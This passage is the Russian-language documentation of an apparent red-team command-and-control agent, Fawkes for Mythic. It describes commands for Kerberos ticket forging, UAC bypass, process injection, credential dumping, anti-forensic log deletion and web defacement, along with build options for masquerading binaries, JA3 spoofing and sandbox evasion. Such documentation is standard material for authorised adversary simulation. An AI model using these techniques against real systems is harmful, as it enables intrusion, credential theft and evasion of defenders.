ticket | `ticket -action forge\|request\|diamond\|renew\|s4u\|pkinit -realm <DOMAIN> -username <user> -key <hex_key> [-key_type aes256\|aes128\|rc4] [-format kirbi\|ccache] [-domain_sid <SID>] [-spn <SPN>] [-server <KDC>] [-impersonate <user>] [-krbtgt_key <hex>] [-target_user <user>] [-ticket <base64>] [-certificate <pem>] [-private_key <pem>]` | Создание, запрос, обновление, делегирование или аутентификация по сертификату для билетов Kerberos. Forge: золотые/серебряные билеты (офлайн). Request: Overpass-the-Hash (онлайн). Diamond: реальный обмен AS + модификация билета для уклонения. Renew: продление времени жизни TGT. S4U: ограниченное делегирование через S4U2Self+S4U2Proxy. PKINIT: аутентификация по сертификату из ADCS/Shadow Creds. Кроссплатформенный (T1558.001, T1558.002, T1550.002, T1134.001, T1649).
tr | `tr -path <file> -from [:lower:] -to [:upper:]` | Преобразование, сжатие или удаление символов в содержимом файла. Поддерживает классы символов и диапазоны. Кроссплатформенный (T1083).
triage | `triage -action <all\|documents\|credentials\|configs\|database\|scripts\|archives\|mail\|recent\|custom\|recon-chain> [-path <dir>] [-hours <n>] [-target <subnet>] [-username <user>] [-password <pass>]` | Поиск ценных файлов для эксфильтрации — документы, учетные данные, конфиги, базы данных (.db/.sqlite), скрипты (.py/.sh/.ps1), архивы (.zip/.tar/.7z), файлы почты (.pst/.eml/.mbox), недавно измененные файлы или пользовательский путь. **recon-chain**: автоматизированная цепочка подзадач — portscan → перечисление общих ресурсов SMB → охота на общих ресурсах → локальная триаж (требует цель, имя пользователя/пароль). Кроссплатформенный (T1083, T1005).
trust | `trust -server <DC> -username <user@domain> -password <pass> [-use_tls]` | Перечисление доверительных отношений домена/леса через LDAP с топологией леса, анализом транзитивности, стойкостью шифрования и определением путей атаки. Кроссплатформенный (T1482).
timestomp | `timestomp -action <get\|copy\|set\|match\|random\|clean-prefetch> -target <file> [-source <file>] [-timestamp <time>]` | Изменение временных меток файла для маскировки. Получение, копирование из другого файла, установка конкретного времени, соответствие соседям по каталогу (IQR) или случайный выбор в пределах диапазона. `clean-prefetch` удаляет файлы Prefetch Windows для указанного исполняемого файла. Windows также изменяет время создания.
tscon | `tscon [-action <list\|hijack\|disconnect\|logoff>] [-session_id <id>]` | **(Только Windows)** Управление сеансами RDP — список, перехват, отключение или завершение сеансов. Захват сеанса без учетных данных (T1563.002).
ts | `ts [-a] [-i PID]` | **(Только Windows)** Список потоков в процессах. По умолчанию показывает только потоки, находящиеся в состоянии ожидания (Suspended/DelayExecution). Используйте -a для всех потоков, -i для фильтрации по PID (T1057).
uac-bypass | `uac-bypass [-technique fodhelper\|computerdefaults\|sdclt\|eventvwr\|silentcleanup\|cmstp\|dismhost\|wusa] [-command <path>]` | **(Только Windows)** Обход UAC для повышения с уровня medium до high. 8 методов: перехват реестра, перехват переменной среды, злоупотребление INF-файлами, перехват CLSID COM, поддельная доверенная директория. По умолчанию запускает обратный вызов с повышенными правами (T1548.002, T1218.003).
uniq | `uniq -path <file> [-count true] [-duplicate true] [-unique_only true]` | Фильтрация или подсчет последовательных дублирующихся строк в файле. Режим подсчета сортирует по частоте. Кроссплатформенный (T1083).
unlink | `unlink -connection_id <uuid>` | Отключение связанного P2P-агента (TCP или именованный канал). Кроссплатформенный (T1572).
uptime | `uptime` | Показать время работы системы, время загрузки и средние нагрузки. Кроссплатформенный (T1082).
upload | `upload` | Загрузка файла на целевой хост с передачей частями. Поддерживает автоматическую распаковку gzip-файлов. Проверка SHA256.
usn-jrnl | `usn-jrnl -action query\|recent\|delete [-volume C:]` | **(Только Windows)** Запрос или удаление журнала изменений NTFS USN — уничтожает историю операций с файлами для антикриминалистики (T1070.004).
vanilla-injection | `vanilla-injection -action <inject\|migrate\|ldpreload> -pid <PID>` | Внедрение шелл-кода в удаленный процесс (inject), миграция агента (migrate: внедрение + выход) или создание нового процесса с LD_PRELOAD .so (ldpreload: только Linux, без ptrace, обходит Yama). **Windows:** VirtualAllocEx/WriteProcessMemory/CreateRemoteThread. **Linux (amd64/arm64):** прямая запись в /proc/PID/mem, LD_PRELOAD через memfd. T1055.001, T1055.009, T1574.006.
vm-detect | `vm-detect [-action detect\|sandbox]` | Обнаружение среды VM/гипервизора или анализ обхода песочницы. `detect`: OUI MAC, DMI/SMBIOS, инструменты VM, SCSI, флаг CPU hypervisor. `sandbox`: скоринговый анализ — количество CPU, ОЗУ, диск, время работы, тайминги сна, имя хоста, количество процессов, имя пользователя. Кроссплатформенный (T1497, T1497.001).
vss | `vss -action <list\|create\|delete\|delete-all\|extract\|inhibit-recovery\|shutdown\|reboot> [-volume C:\\] [-id <id>] [-confirm true]` | Техники воздействия: управление VSS (Windows), подавление восстановления (T1490), выключение/перезагрузка (T1529, кроссплатформенно). Разрушительные действия требуют -confirm true. MITRE T1003.003, T1490, T1529.
watch-dir | `watch-dir -path <dir> [-interval 5] [-duration 300] [-depth 3] [-pattern *.docx] [-hash true]` | Мониторинг каталога на изменения файловой системы — обнаружение новых, измененных и удаленных файлов через опрос. Поддерживает фильтрацию по glob и обнаружение хэша MD5. Кроссплатформенный (T1083, T1119).
wc | `wc -path <file_or_dir> [-pattern <glob>]` | Подсчет строк, слов, символов и байтов в файлах. Режим каталога с фильтрацией по шаблону glob и итогами. Кроссплатформенный (T1083).
wdigest | `wdigest -action <status\|enable\|disable>` | **(Только Windows)** Управление кэшированием открытых текстовых паролей WDigest. Включение для захвата паролей в открытом виде при следующем входе. MITRE T1003.001, T1112.
winrm | `winrm -host <target> -username <user> [-password <pass>] [-hash <NT hash>] -command <cmd> [-shell cmd\|powershell] [-auto-verify]` или `winrm -action check -host <target> [-username <user> -password <pass>]` | Выполнение команд на удаленных хостах Windows через WinRM с аутентификацией NTLM. Поддерживает pass-the-hash, cmd.exe и PowerShell. `check` проверяет предварительные требования WinRM (порты 5985/5986, аутентификация, оболочка). Кроссплатформенный (T1021.006, T1550.002).
windows | `windows [-action list\|search] [-filter <string>] [-all]` | **(Только Windows)** Перечисление видимых окон приложений — показывает HWND, PID, имя процесса, класс окна и заголовок. Поиск фильтрует по заголовку/процессу/классу. MITRE T1010.
who | `who [-all true]` | Показать вошедших в систему пользователей и активные сеансы. Linux: парсинг utmp. Windows: WTS API. macOS: команда who. Кроссплатформенный (T1033).
whoami | `whoami` | Отображение текущего пользователя и контекста безопасности. Windows: имя пользователя, SID, тип токена, уровень целостности, членство в группах, привилегии. Linux: пользователь, UID, GID, группы, эффективные возможности (расшифрованные), контекст SELinux/AppArmor, обнаружение контейнера. macOS: пользователь, UID, GID, группы.
wmi | `wmi -action <execute\|query\|process-list\|os-info\|upload\|exec-staged\|check> [-target <host>] [-command <cmd>] [-query <wql>]` | **(Только Windows)** Выполнение WMI-запросов, создание процессов, загрузка файлов и поэтапное выполнение через COM API. upload: передача файлов через certutil/PowerShell staging. exec-staged: загрузка, затем выполнение с автоочисткой. `check` проверяет предварительные требования WMI (RPC 135, связь WMI). MITRE T1047, T1570.
wmi-persist | `wmi-persist -action <install\|remove\|list> -name <id> -trigger <logon\|startup\|interval\|process> -command <exe> [-consumer_type <command\|script>]` | **(Только Windows)** Персистентность через подписку на события WMI через COM API. Поддерживает потребители CommandLine и ActiveScript (VBScript/JScript). Бесфайлово, переживает перезагрузки. MITRE T1546.003.
wlan-profiles | `wlan-profiles [-name <SSID>]` | Восстановление сохраненных профилей и учетных данных WiFi. Windows: WLAN API, Linux: NetworkManager/wpa_supplicant/iwd, macOS: связка ключей. Кроссплатформенный (T1555).
write-file | `write-file [-action write\|deface] -path <file> -content <text> [-base64 true] [-append true] [-mkdir true] [-confirm DEFACE]` | Запись содержимого в файлы или порча веб-страниц. `write`: создание/перезапись/добавление (по умолчанию). `deface`: замена веб-контента сообщением о порче (T1491, защитная блокировка). Кроссплатформенный (T1105, T1491).
write-memory | `write-memory <dll_name> <function_name> <start_index> <hex_bytes>` | **(Только Windows)** Запись байтов в адрес функции DLL.
xattr | `xattr -action <list\|get\|set\|delete> -path <file> [-name <attr>] [-value <data>] [-hex true]` | **(Только Linux/macOS)** Управление расширенными атрибутами файлов — список, получение, установка, удаление. Unix-дополнение к Windows ADS для сокрытия данных (T1564.004).## Расширение команд Forge
Fawkes поддерживает расширение команд [Mythic Forge](https://github.com/MythicAgents/forge), которое динамически дополняет возможности агента внешними наборами инструментов. Когда Forge установлен вместе с Mythic, дополнительные команды автоматически появляются в интерфейсе Mythic для обратных вызовов Fawkes — без необходимости пересборки агента.
**Поддерживаемые коллекции инструментов:**
| Коллекция | Тип | Выполняется через | Примеры |
|------------|------|-------------|----------|
| [SharpCollection](https://github.com/Flangvik/SharpCollection) | .NET сборки | `inline-assembly` | Seatbelt, SharpUp, Rubeus, Certify, SharpHound, SharpDPAPI |
| [Sliver Armory](https://github.com/MythicAgents/forge) | BOF/COFF файлы | `inline-execute` | SA-whoami, SA-adcs-enum, SA-ldapsearch, SA-nanodump |
### Установка (новая установка)
**Шаг 1: Установка Forge**```bash
cd /path/to/Mythic
sudo ./mythic-cli install github https://github.com/MythicAgents/forge
Шаг 2: Добавление Fawkes в поддержку типов полезной нагрузки Forge
Отредактируйте InstalledServices/forge/payload_type_support.json и добавьте запись Fawkes в JSON-массив:```json
{
"agent": "fawkes",
"bof_command": "inline-execute",
"bof_file_parameter_name": "bof_file",
"bof_argument_array_parameter_name": "coff_arguments",
"bof_entrypoint_parameter_name": "function_name",
"inline_assembly_command": "inline-assembly",
"inline_assembly_file_parameter_name": "assembly_file",
"inline_assembly_argument_parameter_name": "assembly_arguments",
"execute_assembly_command": "",
"execute_assembly_file_parameter_name": "",
"execute_assembly_argument_parameter_name": "",
"assembly_default_execution_method": "inline_assembly"
}
Это сопоставляет общий интерфейс параметров Forge с конкретными именами команд и параметров Fawkes. Сопоставление полей:
- `bof_command` → команда Fawkes `inline-execute` (выполнение BOF/COFF)
- `inline_assembly_command` → команда Fawkes `inline-assembly` (выполнение сборок .NET)
- `execute_assembly_command` → пусто (Fawkes использует inline-assembly для всех выполнений .NET)
- Имена параметров должны в точности соответствовать тому, что определяют функции агента Fawkes в группе параметров "Forge"
**Шаг 3: Перестройте и перезапустите**```bash
sudo ./mythic-cli build forge
sudo ./mythic-cli restart forge
sudo ./mythic-cli restart fawkes
Шаг 4: Регистрация источников инструментов
Откройте пользовательский интерфейс Mythic и используйте команду forge_register (доступна на любом callback-е) для регистрации источников инструментов. Распространённые источники:
| Источник | Тип | Что предоставляет |
|---|---|---|
| Rubeus | .NET сборка | Атаки Kerberos (kerberoasting, манипуляции с билетами, делегирование) |
| Seatbelt | .NET сборка | Обследование безопасности хоста (привилегии, учётные данные, конфигурации) |
| Certify | .NET сборка | Перечисление и эксплуатация служб сертификатов AD |
| SharpHound | .NET сборка | Сбор данных BloodHound |
| SharpUp | .NET сборка | Проверки локального повышения привилегий |
| SharpView | .NET сборка | Перечисление Active Directory (порт PowerView) |
| nanodump | BOF | Дамп памяти LSASS через MiniDumpWriteDump |
| credman | BOF | Сбор учётных данных из диспетчера учётных данных Windows |
Для регистрации источника выполните forge_register с commandName, установленным на простое имя источника (например, Rubeus, а не forge_net_Rubeus), и remove, установленным на false.
После регистрации Forge загружает бинарные файлы инструментов и создаёт расширенные команды (например, forge_net_Rubeus, forge_bof_nanodump), которые появляются в списке команд callback-а.
Шаг 5: Проверка
Существующие callback-ы автоматически видят команды Forge — новая нагрузка не требуется. Проверьте, запустив зарегистрированный инструмент:
- Сначала выполните
autopatchилиstart-clr(патч AMSI для .NET инструментов) - Выберите команду Forge (например,
forge_net_Seatbelt) - Введите аргументы (например,
-group=system) - Выполните — Forge преобразует команду в
inline-assemblyсо встроенным бинарным файлом инструмента
Советы по использованию
- Для .NET инструментов (SharpCollection) сначала выполните
start-clrс autopatch, чтобы инициализировать CLR и пропатчить AMSI — без этого Защитник Windows может заблокировать выполнение сборки - Для BOF-инструментов (Sliver Armory) убедитесь, что BOF скомпилированы для x64
- Никакие специальные параметры сборки не требуются — поддержка Forge встроена в команды
inline-executeиinline-assemblyFawkes через группу параметров "Forge" - Команды Forge работают на существующих callback-ах без пересборки агента
- При отправке команд Forge через API включайте
payload_type: "forge"в мутациюcreateTask— без этого Mythic ищет только среди собственного типа нагрузки callback-а
Техники инъекций
Инъекция PoolParty
| Вариант | Техника | Триггер | Go-шеллкод |
|---|---|---|---|
| 1 | Перезапись стартовой процедуры фабрики Worker | Создание нового рабочего потока | Нет |
| 2 | Вставка TP_WORK | Обработка очереди задач | Да |
| 3 | Вставка TP_WAIT | Сигнализация событий | Да |
| 4 | Вставка TP_IO | Завершение файлового ввода/вывода | Да |
| 5 | Вставка TP_ALPC | Обмен сообщениями через ALPC | Да |
| 6 | Вставка TP_JOB | Назначение объекта задания | Да |
| 7 | Вставка TP_DIRECT | Порт завершения ввода/вывода | Да |
| 8 | Вставка TP_TIMER | Истечение таймера | Да |
Инъекция Opus
| Вариант | Техника | Цель | Go-шеллкод |
|---|---|---|---|
| 1 | Цепочка обработчиков Ctrl-C | Только консольные процессы | Нет |
| 4 | PEB KernelCallbackTable | Только GUI-процессы | Да |
Описания вариантов см. в Детали техник инъекций.
Параметры сборки
Методы экспорта DLL
При сборке в режиме shared (DLL) или windows-shellcode параметр сборки dll_exports управляет тем, какие экспорты DLL включаются:
| Настройка | Экспорты | Случай использования |
|---|---|---|
standard (по умолчанию) | Run, Fire, VoidFunc | sRDI-шеллкод, rundll32, универсальные загрузчики |
full | Standard + DllRegisterServer, DllUnregisterServer, ServiceMain, DllGetClassObject, DllCanUnloadNow | regsvr32, svchost-сервис, COM-угон |
Методы выполнения с полными экспортами:
| Экспорт | Выполнение | MITRE |
|---|---|---|
DllRegisterServer | regsvr32 /s fawkes.dll | T1218.010 |
DllUnregisterServer | regsvr32 /u /s fawkes.dll | T1218.010 |
ServiceMain | svchost.exe DLL-сервис (только Windows) | T1543.003 |
DllGetClassObject + DllCanUnloadNow | COM-угон InprocServer32 | T1546.015 |
Инфляция бинарного файла
Fawkes поддерживает опциональную инфляцию бинарного файла во время сборки. Это встраивает блок повторяющихся байтов в скомпилированный агент, что может быть использовано для увеличения размера файла или снижения показателей энтропии.
Два параметра сборки управляют этим:
- inflate_bytes — шестнадцатеричные байты для встраивания (например,
0x90или0x41,0x42) - inflate_count — количество повторений шаблона байтов
Шаблон байтов повторяется inflate_count раз, поэтому общий добавленный размер равен длина(шаблон_байтов) * inflate_count.
Быстрая справка по размерам:
| inflate_count | Один байт (например, 0x90) | Два байта (например, 0x41,0x42) |
|---|---|---|
| 1,000 | 1 КБ | 2 КБ |
| 10,000 | 10 КБ | 20 КБ |
| 100,000 | 100 КБ | 200 КБ |
| 1,000,000 | 1 МБ | 2 МБ |
| 3,000,000 | 3 МБ | 6 МБ |
| 10,000,000 | 10 МБ | 20 МБ |
Если инфляция не настроена, к бинарному файлу добавляется только 1 байт служебных данных.
Встраивание ресурсов PE (только Windows)
Бинарные файлы PE для Windows содержат метаданные ресурсов — информацию о версии, значки и манифесты UAC, которые видны в свойствах файла, диспетчере задач и проводнике. По умолчанию бинарные файлы Go не содержат таких метаданных, что является сильным сигналом обнаружения для инструментов безопасности и аналитиков.
Fawkes поддерживает встраивание ресурсов PE во время сборки для имитации легитимных бинарных файлов Windows:
Параметры сборки:
| Параметр | Тип | Описание |
|---|---|---|
pe_preset | Выбор | Быстрый пресет для имитации (notepad, svchost, cmd, explorer и т.д.) |
pe_company | Строка | CompanyName (например, "Microsoft Corporation") |
pe_description | Строка | FileDescription — видно в диспетчере задач |
pe_product | Строка | ProductName |
pe_version | Строка | Версия файла/продукта (например, "10.0.19041.1") |
pe_copyright | Строка | LegalCopyright |
pe_original_filename | Строка | OriginalFilename — видно криминалистическим инструментам |
pe_icon | Файл | Пользовательский файл значка .ico или .png |
pe_manifest | Выбор | Уровень UAC: asInvoker, highestAvailable, requireAdministrator |
Пресеты (10 распространённых бинарных файлов Windows с реальной версией):
notepad, svchost, cmd, explorer, msiexec, dllhost, rundll32, conhost, taskhostw, RuntimeBroker
Отдельные поля переопределяют значения пресетов. Если никакие параметры ресурсов PE не заданы, бинарный файл остаётся неизменным, как при стандартном выводе Go.
Функции OpSec
Отслеживание артефактов
Fawkes автоматически регистрирует артефакты в Mythic для команд, важных с точки зрения opsec. Артефакты отображаются в пользовательском интерфейсе Mythic на вкладке Артефакты, предоставляя операторам чёткую картину всех криминалистических индикаторов, созданных во время взаимодействия.
Отслеживаемые типы артефактов:
| Тип | Команды |
|---|---|
| Создание процесса | run, powershell, spawn, argue |
| Вызов API | net-enum, net-user, service, wmi, schtask, procdump, hashdump, eventlog, ntdll-unhook, syscalls, firewall, dcom, vss (create/delete), psexec |
| Завершение процесса | kill |
| Инъекция в процесс | vanilla-injection, apc-injection, threadless-inject, poolparty-injection, opus-injection, module-stomp, thread-hijack |
| Запись файла | upload, cp, mv |
| Создание файла | mkdir |
| Удаление файла | rm |
| Изменение файла | timestomp |
| Запись в реестр | reg (write/delete), remote-reg (set/delete), persist (registry, com-hijack, screensaver methods), uac-bypass, defender (add/remove-exclusion) |
| Сохранение реестра | reg (save/creds) |
| Удалённый реестр | remote-reg (query/enum/set/delete через WinReg RPC) |
| Удалённая служба | remote-service (list/query/create/start/stop/delete/modify-path/trigger/dll-sideload через SVCCTL RPC) |
| Вход в систему | make-token |
| Кража токена | steal-token, getsystem |
Команды только для чтения (ls, ps, cat, env и т.д.) не создают артефактов.
Интеграция с хранилищем учётных данных
Команды сбора учётных данных автоматически сообщают о находках в хранилище Учётные данные Mythic, делая их доступными для поиска и экспорта из пользовательского интерфейса Mythic.
| Команда | Тип учётных данных | Что сообщается |
|---|---|---|
| hashdump | хэш | SAM NTLM-хэши (Windows), MSV1_0 NT/LM/SHA-хэши из обхода LSASS на месте (Windows, insitu-full), Kerberos TGT и билеты служб в формате .kirbi (Windows, tickets), хэши /etc/shadow (Linux), PBKDF2-хэши (macOS) |
| kerberoast | хэш | TGS-билеты для офлайн-взлома |
| asrep-roast | хэш | AS-REP-хэши |
| dcsync | хэш | NTLM + ключи AES через DRSGetNCChanges |
| lsa-secrets | открытый текст/хэш/ключ | Пароли служб, кэшированные учётные данные, ключи DPAPI |
| laps | открытый текст | Пароли LAPS v1 и v2 |
| gpp-password | открытый текст | Зашифрованные пароли GPP из SYSVOL |
| browser | открытый текст | Сохранённые пароли Chrome/Edge/Firefox (все платформы), куки (все платформы), история, автозаполнение, закладки |
| dpapi | открытый текст/хэш | Секреты, защищённые DPAPI |
| credman | открытый текст | Записи диспетчера учётных данных (при действии дампа) |
| make-token | открытый текст | Учётные данные, использованные для создания токена |
| cred-harvest | хэш/открытый текст/токен | Теневые хэши, переменные окружения облака, чувствительные переменные окружения, OAuth/JWT-токены M365, живые куки/хранилища браузера через CDP |
| credential-prompt | открытый текст | Учётные данные, захваченные через диалоговое окно (macOS/Windows/Linux) |
Отслеживание нажатий клавиш
Команда keylog интегрируется с функцией Keylogs Mythic. Когда нажатия клавиш возвращаются через stop или dump, они автоматически разбираются по заголовкам окон и отправляются в трекер нажатий клавиш Mythic с привязкой к пользователю. Нажатия клавиш доступны для поиска в пользовательском интерфейсе Mythic по заголовку окна, пользователю или содержимому нажатий.
Отслеживание токенов
Команды make-token и steal-token регистрируют токены в трекере Токены обратных вызовов Mythic. Это обеспечивает видимость того, какие токены связаны с каждым callback-ом, включая олицетворённую личность пользователя и исходный процесс. Команда rev2self автоматически удаляет отслеживаемые токены, когда олицетворение сбрасывается.
Проверка сертификатов TLS
Управляйте тем, как агент проверяет HTTPS-сертификаты при связи с C2-сервером. Настраивается во время сборки через параметр tls_verify:
| Режим | Описание |
|---|---|
none | Пропустить всю проверку TLS (по умолчанию, обратно совместимо) |
system-ca | Проверять сертификаты через доверенное хранилище ОС |
pinned:<sha256> | Привязать к конкретному отпечатку сертификата (SHA-256 hex). Агент отклоняет соединения, если сертификат сервера не совпадает. |
Привязка сертификатов предотвращает MITM-перехват трафика агента, даже если злоумышленник контролирует доверенный ЦС.
Спуфинг отпечатка TLS (JA3)
Стандартный стек TLS Go выдаёт характерный JA3-хэш, который инструменты сетевой безопасности могут идентифицировать как не-браузерный трафик. Параметр сборки tls_fingerprint использует uTLS для спуфинга ClientHello TLS, создавая JA3-отпечаток, соответствующий браузеру.
| Отпечаток | Описание |
|---|---|
chrome | Chrome/Chromium (по умолчанию) — самый распространённый браузер, лучший для слияния |
firefox | Firefox |
safari | Safari |
edge | Microsoft Edge |
rotate | Случайным образом выбирает Chrome/Firefox/Safari/Edge для каждого соединения (предотвращает корреляцию JA3) |
random | Полностью рандомизированный отпечаток (не соответствует браузеру) |
go | Без спуфинга — использовать стандартный стек TLS Go |
Взаимная аутентификация по TLS-сертификату клиента (mTLS)
Добавьте аутентификацию по клиентскому сертификату в профиль C2 HTTP. При настройке агент предоставляет клиентский сертификат во время рукопожатия TLS, позволяя C2-серверу проверить идентичность агента. Это предотвращает пассивный перехват HTTPS и MITM-атаки через прокси.
| Параметр | Описание |
|---|---|
mtls_cert | PEM-кодированный клиентский сертификат |
mtls_key | PEM-кодированный закрытый ключ клиента |
Сертификат/ключ кодируются в base64 при сборке, XOR-шифруются, если включено обфускация строк, и хранятся в хранилище конфигурации AES-256-GCM во время выполнения. Сочетается с существующими режимами проверки TLS и спуфингом отпечатка JA3.
Резервные URL C2
Несколько URL обратных вызовов C2 с автоматическим переключением на резервный. Если основной хост обратного вызова недоступен, агент прозрачно перебирает резервные URL, прежде чем применить задержку.
| Параметр | Описание |
|---|---|
fallback_hosts | Разделённые запятыми резервные хосты C2 (например, http://backup1.example.com,https://backup2.example.com) |
Тот же порт и шифрование, что и у основного. Запоминает последний успешный URL. Работает с хранилищем конфигурации и XOR-обфускацией.
Привязка к окружению / Ограничители
Предотвратите выполнение агента на неавторизованных системах. Настраивается во время сборки — агент молча завершает работу до установления какого-либо сетевого контакта, если проверки не пройдены. Никакого логирования, никаких артефактов, никакого трафика C2.
| Параметр | Тип | Описание |
|---|---|---|
env_key_hostname | Regex | Имя хоста должно соответствовать (например, WORKSTATION-\d+ или .*\.contoso\.com) |
env_key_domain | Regex | Домен должен соответствовать (например, CONTOSO или .*\.local) |
env_key_username | Regex | Имя пользователя должно соответствовать (например, admin.* или svc_.*) |
env_key_process | Строка | Имя процесса, который должен быть запущен (например, outlook.exe) |
env_key_cpuid | Regex | Строка бренда CPU должна соответствовать (например, .*Intel.*i7-12700.* или .*AMD.*5950X.*). Предотвращает выполнение в песочницах с другими моделями CPU. |
env_key_derive | Выбор | Зашифровать конфигурацию C2 с помощью ключа, полученного из свойств целевого хоста. Варианты: hostname, domain, username, hostname+domain, hostname+domain+username. Неправильный хост = сбой AES-дешифрования = молчаливый выход. Сильнее, чем проверка regex — значения конфигурации никогда не появляются в бинарном файле. |